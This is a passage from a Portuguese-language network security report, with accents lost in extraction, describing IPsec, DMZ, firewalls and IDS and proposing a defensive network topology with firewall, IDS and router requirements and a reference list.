do cabealho IP. O campo Protocol no cabealho IP alterado para indicar
que um cabealho Ipsec segue o cabealho IP normal ( antes do cabealho
TCP ). O cabealho IPsec contem informaes de segurana, principalmente
o identificador SA ( security association ), um novo numero de seqncia e,
possivelmente, uma verificao de integridade de carga til.
Modo de tnel: Todo o cabealho encapsulado no corpo de um novo
pacote IP com um cabealho IP completamente novo. O modo tnel til
quando o tnel termina em um local diferente do destino final. Em alguns
casos, o fim do tnel uma maquina de gateway de segurana, por
exemplo, um firewall. Nesse modo, o firewall encapsula e desencapsula
pacotes medida que eles passam pelo mesmo. Quando o tnel termina

nessa maquina segura, as mquinas da rede no tem de tomar


conhecimento do IPsec. Isso tarefa do firewall. O modo tnel tambm til
quando um conjunto de conexes TCP agregado e tratado como um nico
fluxo codificado, porque isso evita que um intruso veja quem est enviando,
quem est recebendo e quantos pacotes so enviados.

3.1.3 DMZ (Zona desmilitarizada)


A DMZ uma pequena rede situada entre uma rede confivel e uma no confivel,
geralmente entre a rede local e a Internet.
A funo de uma DMZ manter todos os servios que possuem acesso externo
(HTTP, FTP, etc) separados da rede local, limitando o dano em caso de comprometimento
de algum servio nela presente por algum invasor. Para atingir este objetivo os
computadores presentes em uma DMZ no devem conter nenhuma rota de acesso rede
local.
A configurao pode ser feita a partir da criao de Redes Virtuais dentro de uma
LAN, tambm chamadas de VLANs, atravs de um recurso que certos Switchs podem
oferecer. Ou seja, redes diferentes que no se "enxergam" dentro de uma mesma rede
(LAN). (Wikipedia)

Figura 12 Ilustrao de uma DMZ

3.1.4 Firewall
Firewall o nome dado ao dispositivo que tem por funo regular o trfego de rede

entre redes distintas e impedir a transmisso e/ou recepo de dados nocivos ou no


autorizados de uma rede a outra. Dentro deste conceito incluem-se, geralmente, os filtros
de pacotes e os proxy de protocolos.
utilizado para evitar que o trfego no autorizado possa fluir de um domnio de
rede para o outro. Apesar de se tratar de um conceito geralmente relacionado a proteo
de um sistema de dados contra invases, o firewall no possui capacidade de analisar
toda a extenso do protocolo, ficando geralmente restrito ao nvel 4 da camada OSI.
Existe na forma de software e hardware, ou na combinao de ambos. (Wikipdia)
A vantagem do Firewall est no fato de que apenas um computador funcionar
como mesmo, protegendo toda a rede, no sendo necessria a instalao de aplicativos
nos demais computadores.
H mais de uma forma de funcionamento de um Firewall, que varia de acordo com
o sistema, aplicao ou desenvolvedor do programa. No entanto, existem dois tipos
bsicos de conceitos de Firewalls: o que baseado em filtragem de pacotes e o que
baseado em controle de aplicaes. Ambos no devem ser comparados, uma vez que
cada um trabalha para um determinado fim.

3.1.5 IDS (Intrusion Detection System)


Um sistema de deteco de intrusos poder monitorar e, na maioria das
ocorrncias, prevenir ataques que possam comprometer mecanismos ou recursos da
rede, protegendo os dados e a integridade do sistema.
Os IDSs esto divididos em duas grandes categorias;
Sistemas de deteco de intrusos baseados em rede (NDIS);
Essa categoria monitora o trfego em um determinado segmento da rede, podendo
operar em modo Normal ou Promscuo, normalmente requerendo funcionamento
em modo Promscuo.
Sistema de deteco de intruso baseados em servidores(HIDS);
Camada extra baseada em hosts que opera logo aps e o Firewall e o NDIS,
podendo operar, principalmente, como Monitor de Rede ou Monitor de Integridade.

3.2 Topologia Atual


Segue uma representao da topologia atual da rede, obtida aps varias analises
de dns e escaneamento de ips em rede.

Figura 13 Rede fisica Atual

3.3 Topologia Proposta

Figura 14 Rede fisica DTIN

Figura 15 Rede logica dentro de VMWARE

3.3.1 Implementao do Firewall


Da anlise das necessidades da rede, prope-se a utilizao de dois Firewalls
interligados em forma de cluster. Uma das grandes vantagens apresentadas por esse
equipamento sua capacidade de interao e funcionamento paralelo com outros
sistemas. Esta potencialidade amplamente utilizada pelo Firewall Box, que pode servir
de base para a implementao de todo o Suite de Segurana, composto pelos softwares:
Analisador de Contexto Web, Analisador de Log e Cliente de Criptografia mas no
descartamos a montagem de um prprio Firewall Box baseado em Linux e roteadores at
mesmo o ASA j existente.
Abaixo algumas informaes tcnicas fornecidas pelo fabricante:
Um Firewall Box tem de atende as necessidades das mdias/grandes empresas a
partir de 5.000 pontos IP. Bom para segurana de servidores Internet (e-mail, www),

proteo de segmentos internos em geral, VPN para links de maior velocidade, para
redes com muitos usurios e grandes fluxos de e-mail, http e criptografia cliente-firewall.
Caractersticas
Possui 2 (duas) portas 10/100/1000BASE-T, com conector RJ-45;
Possui 1 (uma) porta 1000BASE-LX, com conectores LC, MT-RJ ou SC;
Suporta 700.000 conexes simultneas;
Possui throughput (velocidade com que dados so transmitidos de um lugar para
outro) de 1500 Mbits;
Possui throughput de 80 Mbits para VPN (Rede Privada Virtual);
Permite 25000 usurios logados;
Suporta o uso de interface WAN para frame-relay, PPP, X-25, e PPoE;
Prov mecanismo de converso de endereos (NAT);
Possibilita o controle de trfego para os protocolos TCP, UDP e ICMP baseado
nos endereos de origem e destino e no servio utilizado em uma comunicao;
Prov mecanismo que possibilite o bloqueio de servios em horrios especficos;
Permite o agrupamento das regras de filtragem por poltica;
Prov mecanismo contra ataques de falsificao de endereos (IP Spoofing)
atravs da especificao da interface de rede pela qual uma comunicao deve se
originar;
Prov proteo contra os ataques de negao de servio SYNFlood, Land, Tear
Drop e Ping ODeath;
Possui mecanismo que limita o nmero mximo de conexes simultneas de um
mesmo cliente para um determinado servio e/ou servidor;
Permite a integrao com o IDS, possibilitando a criao de regras temporrias
no Firewall, com durao pr-determinada, de forma automtica;
Deve-se inicialmente aplicar regras que visem o bloqueio de todo o trafego de
qualquer origem para qualquer destino, com exceo das portas dos servios bsicos que
garantam a funcionalidade da rede. Assim, a configurao sugerida :
Habilitar o Firewall "nvel 3" para que possa filtrar pacotes TCP/IP
Habilitar o Firewall sem NAT (Number Address Translator);
No habilitar o Firewall "nvel 2", possibilitando a filtragem de trafego ARP, ou seja,
controle de MAC address;
Habilitar o bloqueio de pacotes multicast;

No habilitar o trfego com IPs tipo "invlidos" de origem ou destino;


Habilitar o controle de banda por IP;
Habilitar o monitoramento de trfego por IP;
Bloquear o acesso de fora da rede nas portas TCP e UDP utilizadas pelo
Windows(135, 136, 137, 138, 139);
Habilitar ICMP;
Habilitar SSH;
Habilitar Telnet apenas para administradores de rede;
Habilitar HTTP;
Habilitar SNMP;
Habilitar FTP;
Habilitar SMTP;
Habilitar POP3;
Habilitar DNS;
Ressalta-se que logo devero surgir pedidos para liberaes de servios
especficos, possibilitando aos Administradores terem um controle mais eficiente sobre as
demandas da rede.

3.3.2 Implementao do IDS


Prope-se um IDS do tipo NIDS, sugerindo-se um equipamento da srie Dragon da
Enterasys ou uma confeco baseada em Linux. Abaixo segue algumas caractersticas do
equipamento ou para o equipamento que abrigara a distribuio:
Possui 4 (quatro) portas 10/100/1000BASE-T para conexo rede;
Possui capacidade de deteco de intrusos e ataques no segmento de rede que
est monitorando e analisando;
Possui funcionalidades para detectar ataques em tempo real;
Possui capacidade de configurar aes para evitar ataques;
Possui capacidade de enviar alertas via SNMP verso 3 (traps SNMP para o
sistema de gerenciamento da rede);
Possui capacidade de enviar alertas via SMTP (envio de e-mails para um ou mais
usurios);

capaz de operar em modo invisvel para a rede, isto , o adaptador que estar
monitorando a rede dever estar em modo promscuo e sem nenhum endereo IP
associado;
Suporta uma base de assinaturas que permita atualizaes automticas e
peridicas de no mnimo uma vez por semana, via protocolo HTTPS;
Suporta a criao de assinaturas, permitindo que se possam criar novas
assinaturas e anex-las a base de dados existente, adaptando-se s reais
necessidades de trfego de rede;
Possui capacidade de gravar todos os eventos em logs (base de dados);
Possui capacidade de gerar relatrios customizados por sensor, horrio, evento,
endereo e por porta;
Possui capacidade de encriptar toda a comunicao com a console.
Possui capacidade de monitorar segmentos de rede Ethernet em 10/100/1000
Mbps;
Suporta uma base de dados com no mnimo 1800 assinaturas para deteco;
Possui capacidade de detectar e bloquear tcnicas comuns de ataques tais como
IP fragmentado ou no sincronizao de TCP;
Permite a instalao em portas espelhadas (mirror) de switches de rede ou em
equipamento tipo tap com funcionalidade bypass automtico, no prejudicando o
trfego da rede caso este equipamento apresente falhas.

3.3.3 Implementao do Roteador Central ou de Ncleo


O mesmo dever suportar autenticao de usurios segundo o padro IEEE
802.1X, apresentar solues quanto a implementao de autenticao EAP/MD5,
EAP/TLS, PEAP e via MAC e suporte a RADIUS mais aconselhavel LDAP.
Dever apresentar as seguintes caractersticas quanto a segurana:
Segurana de acesso de usurios, baseada no padro 802.1X, dispondo tambm
de autenticao multi-usurios baseado no MAC e bloqueio de portas atravs do
MAC;
Segurana de redes atravs de ACLs e preveno contra DoS (Denial of
Service);
Segurana de hosts atravs de SSH verso 2;
Limite de banda baseado em hosts;
Limite de banda baseado em VLANs.

O processo de substituio do roteador dever ser gradativo, no pondo em risco


as atividades rotineiras da Rede com eventuais problemas decorrentes da implantao do
mesmo.
Aps sua devida implantao, deve-se finalmente criar as VLANs(abordadas
anteriormente) para devida diviso de departamentos com um melhor controle de banda
que vise atender as necessidades de cada segmento da rede. Atenta-se tambm para a
criao de ACLS em cada VLAN.

3.3.4 Implementao dos Switchs C2 e A2


Os Switchs C2 que esto ligados ao Roteador de Ncleo so de Distribuio
enquanto os Switchs A2 so de Acesso. Os mesmos devero apresentar as mesmas
caractersticas citadas para o Roteador de Ncleo.
Com essa topologia, os Switchs de Distribuio(C2) devero funcionar no nvel 3,
permitindo, atravs da conexo com o NIDS, o bloqueio de suas portas frente a possveis
ataques sofridos em equipamentos abaixo destes, evitando assim, que este ataque
interfira na porta do roteador de ncleo. Este processo se da em um tempo mximo de 4
segundos, tempo este necessrio para que o IDS detecte o ataque, efetue um scan no
Switch, receba a resposta do mesmo e envie uma mensagem de volta, bloqueando a
referida porta.
Os Switchs de Acesso(A2) tambm sero de nivel 3, nada impedindo que estes
sejam de nvel 2, uma vez que ligam diretamente os hosts da Rede
Ressalta-se que ambos os Switchs usados devem guardar as configuraes do
Roteador de Ncleo, uma vez que recebem replicaes do mesmo, evidenciando a
necessidade da completa abolio de HUBS da Rede!

4. CONCLUSAO
A segurana de uma rede depende de vrios fatores, onde a falta de ateno em
um deles poder por todo o sistema em risco, possibilitando que portas sejam abertas ao
desconhecido. Na busca da qualidade na segurana da informao, muitos modelos e
sugestes so alcanados, alguns de custo elevado, porm, em grande numero dos
casos, a segurana pode ser atingida por meio de mecanismos de baixo custo, com
implementaes de princpios bsicos e, principalmente, uma boa poltica com normas e
diretrizes de segurana.
Neste processo, deve-se estar atento s novas tecnologias que buscam o

comprometimento das informaes, para assim, garantir a integridade do sistema e uma


moderna poltica que esteja sempre a frente do lado oposto da moeda.

5. REFERENCIAS BIBLIOGRFICAS
1. Man-In-The-Middle Attack - Serious IE 5.X and 6.0 SSL Security Flaw Revealed. Disponivel em
<http://www.theworldjournal.com/special/nettech/news/iesecurity.htm>
2. Cracking NTLMv2 Authentication (2002). Disponvel em <http://www.blackhat.com/presentations/win-usa02/urity-winsec02.ppt>
3. The NTLM Authentication Protocol and Security Support Provider. Disponivel em
<http://davenport.sourceforge.net/ntlm.html>
4. JtR & NTLMv2 passwords. Disponvel em <http://osdir.com/ml/security.openwall.john.user/200605/msg00011.html>
5. Password Attack on Kerberos V and Windows 2000. Disponivel em
<http://users.tkk.fi/~autikkan/kerberos/docs/phase1/pdf/LATEST_password_attack.pdf>
6. Russian Password Crackers. Disponvel em <http://www.passwordcrackers.com/>
7. Redes Privadas Virtuais (Virtual Private Networks). Disponvel em
<http://www.redhat.com/docs/manuals/enterprise/RHEL-4-Manual/pt_br/security-guide/ch-vpn.html>
8. Usando o IPsec para proteo de rede. Disponvel em
<http://www.microsoft.com/brasil/technet/Artigos/Seguranca/sm121504.mspx>
9. Servidor de Autenticao Freeradius com base de dados no MySQL. Disponvel em
<http://www.slackwarebrasil.com.br/web_site/artigos/artigo_completo.php?aid=152>
10. Redes Locais Virtuais VLANs. Disponvel em
<http://www.estv.ipv.pt/PaginasPessoais/pcoelho/rc/Material%20RC/vlans.pdf>
11. Squid, Proxy transparente. Disponvel em <http://wiki.forumdebian.com.br/index.php/Squid>
12. Projeto da Topologia da Rede. Disponvel em
<http://www.dsc.ufcg.edu.br/~jacques/cursos/pr/html/logico/logico1.htm>
13. Engenharia de Redes de Comunicao da Universidade de Braslia, Segurana de Redes. Disponvel
em <http://www.redes.unb.br/security/index.html>

14. Linux logando no Domnio NT. Disponvel em <http://www.vivaolinux.com.br/artigos/verArtigo.php?


codigo=1348>